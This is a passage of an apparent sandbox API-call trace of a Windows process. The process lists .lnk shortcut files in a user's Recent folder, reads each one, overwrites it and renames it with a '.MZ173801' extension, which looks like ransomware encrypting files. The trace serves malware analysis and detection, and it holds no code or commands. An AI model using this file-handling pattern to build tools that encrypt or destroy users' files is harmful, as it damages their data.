lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.472] GetCurrentThreadId () returned 0x1358 [0109.472] GetCurrentThreadId () returned 0x1358 [0109.472] GetCurrentThreadId () returned 0x1358 [0109.472] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.473] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.473] GetCurrentThreadId () returned 0x1358 [0109.473] GetCurrentThreadId () returned 0x1358 [0109.473] GetCurrentThreadId () returned 0x1358 [0109.473] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ImYAKHvtRzfAlzW.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\imyakhvtrzfalzw.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.473] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.473] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.473] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3f4 [0109.473] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.473] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3f4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3f4, lpOverlapped=0x0) returned 1 [0109.474] CloseHandle (hObject=0x3f4) returned 1 [0109.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ImYAKHvtRzfAlzW.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\imyakhvtrzfalzw.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.475] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3f4, lpOverlapped=0x0) returned 1 [0109.476] CloseHandle (hObject=0x3f4) returned 1 [0109.477] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ImYAKHvtRzfAlzW.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\imyakhvtrzfalzw.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ImYAKHvtRzfAlzW.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\imyakhvtrzfalzw.flv.lnk.mz173801")) returned 1 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.477] GetCurrentThreadId () returned 0x1358 [0109.478] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cbf859b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9cbf859b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9cbf859b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="IZVvQMMfV6LuTAy.lnk", cAlternateFileName="IZVVQM~1.LNK")) returned 1 [0109.478] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.478] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.478] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IZVvQMMfV6LuTAy.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\izvvqmmfv6lutay.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cbf859b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9cbf859b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9cbf859b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x45a)) returned 1 [0109.478] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.478] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.478] GetCurrentThreadId () returned 0x1358 [0109.478] GetCurrentThreadId () returned 0x1358 [0109.478] GetCurrentThreadId () returned 0x1358 [0109.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.479] GetCurrentThreadId () returned 0x1358 [0109.479] GetCurrentThreadId () returned 0x1358 [0109.479] GetCurrentThreadId () returned 0x1358 [0109.479] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IZVvQMMfV6LuTAy.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\izvvqmmfv6lutay.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.479] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.479] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.479] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x45a [0109.480] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.480] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x45a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x45a, lpOverlapped=0x0) returned 1 [0109.480] CloseHandle (hObject=0x3f4) returned 1 [0109.480] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IZVvQMMfV6LuTAy.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\izvvqmmfv6lutay.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.481] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x45a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x45a, lpOverlapped=0x0) returned 1 [0109.482] CloseHandle (hObject=0x3f4) returned 1 [0109.483] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IZVvQMMfV6LuTAy.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\izvvqmmfv6lutay.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IZVvQMMfV6LuTAy.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\izvvqmmfv6lutay.lnk.mz173801")) returned 1 [0109.483] GetCurrentThreadId () returned 0x1358 [0109.483] GetCurrentThreadId () returned 0x1358 [0109.483] GetCurrentThreadId () returned 0x1358 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.484] GetCurrentThreadId () returned 0x1358 [0109.484] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea801a37, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea801a37, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea801a37, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3a6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="I_TP.lnk", cAlternateFileName="")) returned 1 [0109.484] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.484] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.484] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\I_TP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\i_tp.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea801a37, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea801a37, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea801a37, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3a6)) returned 1 [0109.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 